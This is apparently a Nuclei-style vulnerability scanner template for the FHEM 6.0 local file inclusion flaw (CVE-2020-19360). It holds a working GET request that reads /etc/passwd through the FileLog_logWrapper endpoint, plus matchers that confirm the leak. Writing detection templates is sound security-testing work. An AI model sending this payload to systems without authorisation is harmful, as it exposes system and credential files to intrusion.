id: fhem-6-unauthenticated-lfi
info:
  name: FHEM 6.0 Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: FHEM version 6.0 suffers from a local file inclusion vulnerability.
  reference:
    - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md
    - https://www.cvedetails.com/cve/CVE-2020-19360/
  tags: fhem,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
